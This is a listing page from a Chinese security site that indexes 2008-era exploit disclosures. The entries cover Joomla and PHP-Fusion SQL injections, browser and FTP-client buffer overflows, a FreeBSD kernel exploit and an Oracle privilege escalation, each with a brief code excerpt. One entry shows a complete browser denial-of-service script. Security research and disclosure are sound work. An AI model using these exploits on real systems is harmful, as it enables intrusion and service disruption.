首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Joomla Component com_liveticker 1.0 Blind SQL Injection Exploit
  日期:2008-12-29 11:45:22 点击:36 评论:0
?php ini_set(max_execution_time,0); print_r(' ############################################################# #Joomla Component com_liveticker(tid) Blind SQL-injection Exploit ############################################################# #[~] Author :
MS Windows Media Player * (.WAV) Remote Integer Overflow PoC
  日期:2008-12-29 11:07:52 点击:37 评论:0
----------------------------------------------------------------------------------------| MS Windows Media Player * (.WAV) Remote Integrer Overflow | | Application: ALL Windows Media player | | Web Site: www.microsoft.com | | Platform: Windows ALL |
Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit (vista)
  日期:2008-12-29 11:03:20 点击:34 评论:0
#!/usr/bin/perl # # Amaya Web Browser = 11.0.1 Remote Buffer Overflow Exploit # Found/Exploit by SkD (skdrat@hotmail.com) # (skd@abysssec.com ) # ----------------------------------------------- # This is advanced buffer overflow exploitation using #
Microsoft Internet Explorer XML Buffer Overflow Exploit
  日期:2008-12-29 11:02:18 点击:25 评论:0
#!/usr/bin/perl # msie_xmlbof_vista.pl # Microsoft Internet Explorer XML Buffer Overflow Exploit # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # # I wanted a reliable shell, so I figured I'd whip up something nice for IE7+Vista # Only
IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit
  日期:2008-12-29 10:57:45 点击:21 评论:0
#!/usr/bin/python # IntelliTamper 2.07/2.08 (MAP File) 0-day Local SEH Overwrite Exploit # Bug discovered by cN4phux cN4phux@gmail.com # Tested on: IntelliTamper 2.07/2.08 / win32 SP3 FR # Shellcode: Windows Execute Command (calc) metasploit.com # He
Firefox, Internet Explorer, Opera & Google Chrome DoS Exploit
  日期:2008-12-28 14:09:45 点击:43 评论:0
html head titleFirefox, Internet Explorer, Opera Google Chrome DoS Exploit (C) 2008 Mu stLive. http://websecurity.com.ua/title /head body script while (1) { document.write('iframe src= frameborder=0 width=0 height=0/iframe'); } /script /body /html
Exploits joomla com_lowcosthotels sql injection
  日期:2008-12-28 14:08:12 点击:29 评论:0
#!/usr/bin/perl #Joomla com_lowcosthotels Sql injection# ######################################## #[] Author : Lovebug #[] www.rbt-4.net #[] Module_Name: com_lowcosthotels #[] Script_Name: Joomla ######################################## use LWP::User
PSI remote integer overflow DoS
  日期:2008-12-28 14:06:45 点击:33 评论:0
#!/usr/bin/python#by sha0 remote integer overflow DoS (Linux windows)#http://jolmos.blogspot.comimport socket, syssock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)try: sock.connect((sys.argv[1],8010))except: print 'Cannot connect!' sys.exit(1)
FreeBSD 7/6x protosw kernel exploit
  日期:2008-12-26 17:43:43 点击:113 评论:0
/* uname -rs FreeBSD 7.0-RELEASE id uid=1001(donb) gid=1001(donb) groups=1001(donb),0(wheel) grep ^root /etc/master.passwd grep: /etc/master.passwd: Permission denied nm /boot/kernel/kernel | grep allproc c0bf26b8 B allproc c0bf2670 B allproc_lock c
SAWStudio 3.9i (prf File) Local Buffer Overflow PoC
  日期:2008-12-25 09:44:55 点击:33 评论:0
# SAWStudio 3.9i (prf file) Buffer overflow Poc # By:Encrypt3d.M!nd # # Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder,GGY,and all my friends ##################################################################### # # when you import Prefernces File prf
Acoustica Mixcraft <= 4.2 Universal Stack Overflow Exploit (SEH)
  日期:2008-12-25 09:44:05 点击:36 评论:0
#!/usr/bin/perl # # Acoustica Mixcraft = 4.2 Universal Stack Overflow Exploit (SEH) # ------------------------------------------------------ # Found/Exploit by SkD (skdrat@hotmail.com) # # MixCraft Download = http://www.acoustica.com/mixcraft/downloa
PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit
  日期:2008-12-25 09:43:10 点击:70 评论:0
#!/usr/bin/perl -w # ------------------------------------------------------- # PHP-Fusion = 7.00.2 Remote Blind SQL Injection Exploit # by athos - staker[at]hotmail[dot]it # download on http://php-fusion.co.uk # --------------------------------------
Joomla Component 5starhotels (id) SQL Injection Exploit
  日期:2008-12-25 09:42:27 点击:43 评论:0
#!/usr/bin/perl -w #Joomla com_5starhotels Sql injection# ######################################## #[~] Author : EcHoLL #[~] www.warezturk.org www.tahribat.com #[~] Greetz : Black_label TURK Godlike Nitrous #[!] Module_Name: com_5starhotels #[!] Scri
BulletProof FTP Client 2.63 Local Heap Overflow PoC
  日期:2008-12-25 09:41:30 点击:93 评论:0
#!/usr/bin/python # # # ------ | ______ _____ (--, __*__ ______ # |____| | | | | | ! ) | | | # [ | |` | | | |----- |__/ | | | ] # | .. | |____! |____| |____ | | |-----| # | _| ----- | ::: | # | | # |_____| | # | # | # ,|. # / | # | | | # | _
Oracle Pwnage Part 6 from DBA to SYS
  日期:2008-12-24 12:04:01 点击:81 评论:0
In some of the past posts I covered finding a user default user account or account with an easy to guess username/password for Oracle and taking that user to DBA via SQL Injection in Oracle packages. I've been neglecting the blog a bit porting some
Exploits FreeSSHd Multiple Remote Stack Overflow Vulnerabilities
  日期:2008-12-24 11:54:25 点击:36 评论:0
# FreeSSHd Multiple Remote Stack Overflow Vulnerabilities. # # Version : 1.2.1 # Advisory: http://www.bmgsec.com.au/advisory/42/ # # Discovered written by: # r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au ) # # After Jeremy Brown reported similar
FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow
  日期:2008-12-24 11:51:42 点击:43 评论:0
#!/usr/bin/perl ############################################################################### # FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow http://freeddsshd.com/ # # Exploit based on securfrog Poc http://www.milw0rm.com/exploits/5709 # # # # C
Google Chrome Browser (ChromeHTML://) Remote Parameter Injection
  日期:2008-12-24 11:50:53 点击:68 评论:0
!-- Google Chrome Browser (ChromeHTML://) remote parameter injection POC by Nine:Situations:Group::bellickstrawdog Site: http://retrogod.altervista.org/ tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3 Li
Getleft 1.2 Remote Buffer Overflow Proof of Concept
  日期:2008-12-24 11:50:28 点击:33 评论:0
#!/usr/bin/perl # # Getleft v1.2.0.0 DoS PoC # Author: Koshi # # Application: Getleft v1.2 # Publisher: Andres Garcia ( http://personal1.iddeo.es/andresgarci/getleft/english/index.html ) # Description: Website Downloader, for such things as offline b
CMS NetCat 3.12 (password_recovery.php) Blind SQL Injection Exploit
  日期:2008-12-24 11:49:34 点击:27 评论:0
? /* NetCat Blind SQL Injection exploit by s4avrd0w [s4avrd0w@p0c.ru] Versions affected 3.12 More info: http://www.netcat.ru/ * tested on version 3.12 usage: # ./NetCat_blind_SQL_exploit.php -s=NetCat_server -u=User_ID The options are required: -u Th
共637页/12733条记录 首页 上一页 [490] [491] [492] 493 [494] [495] [496] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved